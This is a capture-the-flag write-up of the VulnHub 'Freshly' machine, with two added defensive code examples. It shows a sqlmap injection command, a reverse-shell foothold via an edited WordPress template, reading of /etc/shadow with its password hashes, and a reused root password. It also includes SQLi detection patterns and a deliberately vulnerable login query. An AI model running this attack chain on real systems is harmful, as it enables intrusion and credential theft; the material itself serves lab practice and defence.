30 March 2023

Pentesting Fun Stuff

following the cyber security path…

TopHatSec: Freshly

Location

https://www.vulnhub.com/entry/tophatsec-freshly,118/

Description

The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. If you can find the secret, send me an email for verification. 🙂
There are a couple of different ways that you can go with this one. Good luck!

Enumeration

Because I need an entry point, I start with an nmap scan to discover open ports.

nmap -A -T4 -sV -p- 192.168.110.5

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-11 14:29 CEST
Nmap scan report for 888.darknet.com (192.168.110.2)
Host is up (0.013s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-02-17T03:30:05
|_Not valid after: 2025-02-14T03:30:05
8080/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
Device type: bridge|general purpose
Running (JUST GUESSING): Oracle Virtualbox (96%), QEMU (95%)
OS CPE: cpe:/o:oracle:virtualbox cpe:/a:qemu:qemu
Aggressive OS guesses: Oracle Virtualbox (96%), QEMU user mode network gateway (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.26 ms 10.0.3.2
2 0.31 ms 888.darknet.com (192.168.110.2)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.52 seconds

So ports 80, 443 and 8080 are open. I'll start with port 80.
"These are not the droids you're looking for". Always love that sentence! Let's check whether it's a hint pointing at /robots.txt. Nothing.

nikto -h http://192.168.110.2/

+ /login.php: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found


SQL Injection

Two login pages. I try /login.php first: there is nothing of interest in the source code, and the HTTP headers show nothing of interest either. I try injecting some single quotes to provoke an error, but nothing. I'm going to try login number 2, and in the meantime I'll give sqlmap a try against login number 1.

sqlmap -u "http://192.168.110.2/login.php/" --data="user=&password=&s=Submit" --random-agent --not-string="0" --level=5 --risk=3
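What a run like this looks like from the defender's side is worth seeing. The following is an added example, not part of the original post: a small scanner over constructed Apache combined-log lines (the IPs, timestamps and user agents are made up) that flags the two injection styles the post relies on, time-based probes such as SLEEP() and boolean-based probes such as AND 1=1, plus the default sqlmap user agent. Note that the sqlmap command above sends its parameters with --data, i.e. in the POST body, which the default access log never records; the sample lines therefore put the parameters in the query string. Catching the real thing needs request-body logging (for instance a ModSecurity audit log) or logging inside login.php itself.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines (not from the original post). Lines 3
# and 4 mimic a time-based and a boolean-based probe against /login.php; the
# --random-agent option used in the post means only line 4 carries the
# default sqlmap user agent, so UA matching alone is not enough.
SAMPLE_LOG = """\
192.168.110.9 - - [11/Aug/2016:14:40:01 +0200] "GET /login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.110.9 - - [11/Aug/2016:14:40:05 +0200] "GET /login.php?user=bob&password=x HTTP/1.1" 200 1 "-" "Mozilla/5.0"
192.168.110.9 - - [11/Aug/2016:14:41:12 +0200] "GET /login.php?user=bob%27+AND+SLEEP%285%29--+&password=x HTTP/1.1" 200 1 "-" "Mozilla/5.0 (compatible; MSIE 9.0)"
192.168.110.9 - - [11/Aug/2016:14:41:19 +0200] "GET /login.php?user=bob%27+AND+1%3D1--+&password=x HTTP/1.1" 200 1 "-" "sqlmap/1.0-dev"
192.168.110.9 - - [11/Aug/2016:14:41:30 +0200] "GET /phpmyadmin/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: ip ident user [ts] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Payload fingerprints, applied to the percent-decoded request target.
SQLI_PATTERNS = [
    ("time-based", re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\s*\(", re.I)),
    ("boolean-based", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("comment-terminator", re.compile(r"(--\s|/\*)")),
    ("quote-break", re.compile(r"'\s*(and|or)\b", re.I)),
]


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    # Decode %xx and '+' so the patterns see the payload the way the database would.
    entry["decoded"] = unquote_plus(entry["target"])
    return entry


def classify(entry):
    """List the fingerprints that match one parsed log entry."""
    tags = [name for name, pat in SQLI_PATTERNS if pat.search(entry["decoded"])]
    if "sqlmap" in entry["ua"].lower():
        tags.append("sqlmap-ua")
    return tags


def scan(log_text):
    """Return (ip, decoded target, tags) for every line that trips a fingerprint."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            findings.append((entry["ip"], entry["decoded"], tags))
    return findings


if __name__ == "__main__":
    for ip, target, tags in scan(SAMPLE_LOG):
        print(f"{ip}  {target}  {','.join(tags)}")
```

Two of the five sample lines are flagged; the ordinary login attempt and the phpMyAdmin visit are not. In practice the per-IP request rate against one endpoint is the stronger signal for a sqlmap run at --level=5 --risk=3, because it fires hundreds of requests in a short window regardless of how the payloads are encoded.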

Login number 2 is a phpMyAdmin page. When I try to log in, I get a response.
(screenshot: phpMyAdmin login error)
A MySQL server. Let's try some single quotes here. I try different combinations, but I don't get the response I want. In the meantime I check on the running sqlmap and see that the first login page is vulnerable to time-based blind SQLi.
(screenshots: sqlmap output listing the tables and their contents)
So I get the credentials of two users. Let's log in with the first user. When I log in with the known credentials, the page responds with a '1'. With bogus credentials, the page responds with a '0'. Because there is nothing else to retrieve from this page, I let sqlmap dump the credentials from the phpmyadmin and wordpress8080 tables.
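The '1'/'0' behaviour described above is exactly what makes a login page usable as a blind-SQLi oracle: the response leaks whether the query matched a row, so sqlmap can infer data one true/false question at a time. The following is an added example, not the challenge's own login.php, showing a constructed login check built the vulnerable way (string concatenation) beside its parameterized fix, against an in-memory SQLite table with made-up users and passwords.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table standing in for the challenge's MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("candycane", "example-pass-1"), ("user", "example-pass-2")],  # made-up values
    )
    return conn


def login_vulnerable(conn, user, password):
    """Deliberately vulnerable: user input is spliced into the SQL text.

    Mirrors the behaviour the post describes: '1' when the query matches a
    row, '0' otherwise, which is the oracle a blind injection needs.
    """
    sql = "SELECT COUNT(*) FROM users WHERE user = '%s' AND password = '%s'" % (user, password)
    (n,) = conn.execute(sql).fetchone()
    return "1" if n else "0"


def login_fixed(conn, user, password):
    """Parameterized query: the input can only ever be compared as a value."""
    sql = "SELECT COUNT(*) FROM users WHERE user = ? AND password = ?"
    (n,) = conn.execute(sql, (user, password)).fetchone()
    return "1" if n else "0"


if __name__ == "__main__":
    conn = make_db()
    # The classic tautology in the password field: with string splicing the
    # WHERE clause becomes  user = 'nobody' AND password = '' OR '1'='1'
    # and matches every row; with a bound parameter it matches none.
    probe = "' OR '1'='1"
    print("vulnerable:", login_vulnerable(conn, "nobody", probe))  # 1
    print("fixed:     ", login_fixed(conn, "nobody", probe))       # 0
```

The parameterized version removes the injection, but it is only half of the fix this box needs: sqlmap was able to dump usable credentials because the table stored passwords in clear text, and the same passwords turned out to be reused for system accounts further on in the walkthrough. Hashing stored passwords (bcrypt or similar) and not sharing them between the web application and the OS would have stopped the rest of the chain.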
When I visit the website on port 8080 there is a comment:

Nice Find!...Proceed

Again no robots.txt, and apart from a directory named /img/ (with a collection of pictures inside) nikto found nothing. When I proceed I arrive at a WordPress site.
There is a comment on the page with another small reference to Star Wars.

Hmm….. maybe you missed something ? –jedi mind tricks….

I don't think I missed anything, since I probably already have the credentials for the WordPress account. Time to use them.

WordPress

(screenshot: WordPress admin dashboard after logging in)

Getting a reverse shell

To get a reverse shell, I edit the 404 page and replace its PHP code with the PHP reverse shell from pentestmonkey.
(screenshots: the edited 404 page and the incoming reverse shell)
And I’m in. Time to search around the system.

python -c 'import pty;pty.spawn("/bin/bash")'
daemon@Freshly:/$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
daemon@Freshly:/$ uname -a
uname -a
Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux

Ubuntu 14.04 with kernel 3.13. I know that privilege escalation is possible on this kernel through overlayfs mounts inside user namespaces. To get that exploit to work I need to compile it, so I need gcc. Let's see if it is available.

daemon@Freshly:/tmp$ compgen -c | grep -i "gcc"
compgen -c | grep -i "gcc"
daemon@Freshly:/tmp$

Nothing. Bummer.
Time to move along and search some more.

daemon@Freshly:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

OK. This was a bit unexpected. I guess this wraps the challenge up. The only thing is that I don't have root access and haven't actually pwned this machine. Stopping now would leave me with an unsatisfying feeling.

daemon@Freshly:/home$ cat /etc/shadow
cat /etc/shadow
root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::
daemon:*:16483:0:99999:7:::
bin:*:16483:0:99999:7:::
sys:*:16483:0:99999:7:::
sync:*:16483:0:99999:7:::
games:*:16483:0:99999:7:::
man:*:16483:0:99999:7:::
lp:*:16483:0:99999:7:::
mail:*:16483:0:99999:7:::
news:*:16483:0:99999:7:::
uucp:*:16483:0:99999:7:::
proxy:*:16483:0:99999:7:::
www-data:*:16483:0:99999:7:::
backup:*:16483:0:99999:7:::
list:*:16483:0:99999:7:::
irc:*:16483:0:99999:7:::
gnats:*:16483:0:99999:7:::
nobody:*:16483:0:99999:7:::
libuuid:!:16483:0:99999:7:::
syslog:*:16483:0:99999:7:::
messagebus:*:16483:0:99999:7:::
user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::
mysql:!:16483:0:99999:7:::
candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::
# YOU STOLE MY PASSWORD FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

After a really long time, I tried the different passwords that were stored in the database against the root account, and guess what? Passwords are reused in this challenge 🙂

daemon@Freshly:/$ su root
su root
Password: SuperSecretPassword
root@Freshly:/# id
id
uid=0(root) gid=0(root) groups=0(root)

Now I can close this challenge with a satisfied feeling.
Good work on making this challenge.